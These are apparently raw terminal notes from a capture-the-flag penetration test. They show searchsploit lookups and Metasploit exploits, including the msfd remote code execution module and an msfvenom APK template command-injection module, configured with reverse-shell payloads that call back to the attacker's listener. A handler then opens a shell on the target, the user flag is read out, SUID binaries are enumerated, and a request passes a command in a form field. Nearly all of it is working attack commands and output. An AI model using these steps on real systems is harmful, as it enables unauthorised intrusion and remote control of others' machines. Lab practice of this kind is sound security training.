
ippoeug@kali:~$ searchsploit nmap
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                      |  Path
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Android - binder Use-After-Free of VMA via race Between reclaim and munmap                                                          | android/dos/46357.txt
Android - Inter-Process munmap due to Race Condition in ashmem                                                                      | android/dos/43464.txt
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)                                                     | multiple/remote/27135.rb
BaconMap 1.0 - Local File Disclosure                                                                                                | php/webapps/15234.txt
BaconMap 1.0 - SQL Injection                                                                                                        | php/webapps/15233.txt
Google Android - Inter-process munmap in android.util.MemoryIntArray                                                                | android/dos/41354.txt
Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap                                          | android/remote/40874.txt
Microsoft Edge - 'UnmapViewOfFile' ACG Bypass                                                                                       | windows/dos/44096.txt
Nmap - Arbitrary File Write                                                                                                         | linux/remote/38741.txt
Novell NetMail 3.52d - NMAP STOR Buffer Overflow (Metasploit)                                                                       | windows/remote/16813.rb
PaX - Double-Mirrored VMA munmap Privilege Escalation                                                                               | linux/local/876.c
Snortreport - '/nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit)                                                     | php/webapps/17947.rb
Zenmap (Nmap) 7.70 - Denial of Service (PoC)                                                                                        | windows_x86/dos/45357.txt
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
hippoeug@kali:~$ searchsploit searchsploit
Exploits: No Results
Shellcodes: No Results
hippoeug@kali:~$ searchsploit msf
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                      |  Path
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Cisco IOS 12 MSFC2 - Layer 2 Frame Denial of Service                                                                                | hardware/dos/23638.pl
CmsFaethon 2.2.0 (ultimate.7z) - Multiple Vulnerabilities                                                                           | php/webapps/11894.txt
CmsFaethon 2.2.0 - 'item' SQL Injection                                                                                             | php/webapps/8054.pl
Joomla! Component com_jmsfileseller - Local File Inclusion                                                                          | php/webapps/17338.txt
Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)                                                                     | java/remote/48332.msf
Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)                                                                    | ruby/remote/44570.rb
Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)                                                      | ruby/remote/44569.rb
Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read                                                      | windows/dos/43522.js
PHP-fusion dsmsf Mod Downloads - SQL Injection                                                                                      | php/webapps/12028.txt
unrar 5.40 - 'VMSF_DELTA' Filter Arbitrary Memory Write                                                                             | multiple/dos/42245.txt
webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload                                                                     | php/webapps/35333.py
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Shellcode Title                                                                                                                    |  Path
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)                                                            | linux_x86/45416.c
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
hippoeug@kali:~$ 






msf5 > use exploit/multi/misc/msfd_rce_remote
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf5 exploit(multi/misc/msfd_rce_remote) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/misc/msfd_rce_remote) > show options

Module options (exploit/multi/misc/msfd_rce_remote):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   55554            yes       The target port (TCP)


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.129  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 10.129.72.251
rhost => 10.129.72.251
msf5 exploit(multi/misc/msfd_rce_remote) > set rport 5000
rport => 5000
msf5 exploit(multi/misc/msfd_rce_remote) > set lhost 10.10.14.12
lhost => 10.10.14.12
msf5 exploit(multi/misc/msfd_rce_remote) > run

[-] Handler failed to bind to 10.10.14.12:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 10.129.72.251:5000 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf5 exploit(multi/misc/msfd_rce_remote) > show options

Module options (exploit/multi/misc/msfd_rce_remote):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.129.72.251    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   5000             yes       The target port (TCP)


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.12      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/misc/msfd_rce_remote) > set lport 6969
lport => 6969
msf5 exploit(multi/misc/msfd_rce_remote) > exploit

[*] Started reverse TCP handler on 10.10.14.12:6969 
[*] Exploit completed, but no session was created.
msf5 exploit(multi/misc/msfd_rce_remote) > back







msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.129  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost 10.10.14.12
lhost => 10.10.14.12
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[+] msf.apk stored at /home/hippoeug/.msf4/local/msf.apk
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > back





upload with lhost 10.10.14.12
set android
use apk template







hippoeug@kali:~$ msfconsole
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v6.0.29-dev                          ]
+ -- --=[ 2098 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with 
irb

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.12
lhost => 10.10.14.12
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.12:4444 
[*] Command shell session 1 opened (10.10.14.12:4444 -> 10.129.72.251:58800) at 2021-02-07 17:06:55 +0800


id
uid=1000(kid) gid=1000(kid) groups=1000(kid)



pwd
/home/kid/html

cd ..
ls
html
logs
snap
user.txt
cat user.txt
05e59c0dba62dcb1bf331f88e92dcd16




id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/at
/snap/snapd/10707/usr/lib/snapd/snap-confine
/snap/snapd/10492/usr/lib/snapd/snap-confine
/snap/core18/1880/bin/mount
/snap/core18/1880/bin/ping
/snap/core18/1880/bin/su
/snap/core18/1880/bin/umount
/snap/core18/1880/usr/bin/chfn
/snap/core18/1880/usr/bin/chsh
/snap/core18/1880/usr/bin/gpasswd
/snap/core18/1880/usr/bin/newgrp
/snap/core18/1880/usr/bin/passwd
/snap/core18/1880/usr/bin/sudo
/snap/core18/1880/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1880/usr/lib/openssh/ssh-keysign
/snap/core18/1944/bin/mount
/snap/core18/1944/bin/ping
/snap/core18/1944/bin/su
/snap/core18/1944/bin/umount
/snap/core18/1944/usr/bin/chfn
/snap/core18/1944/usr/bin/chsh
/snap/core18/1944/usr/bin/gpasswd
/snap/core18/1944/usr/bin/newgrp
/snap/core18/1944/usr/bin/passwd
/snap/core18/1944/usr/bin/sudo
/snap/core18/1944/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1944/usr/lib/openssh/ssh-keysign
















===========

POST / HTTP/1.1
Host: 10.129.72.251:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.129.72.251:5000/
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Connection: close
Upgrade-Insecure-Requests: 1

search=&action=pwd


JSON web page
action: "pwd"
search: ""

Raw Data: {"action":"pwd","search":""}



============



windows requires a exe ext template file





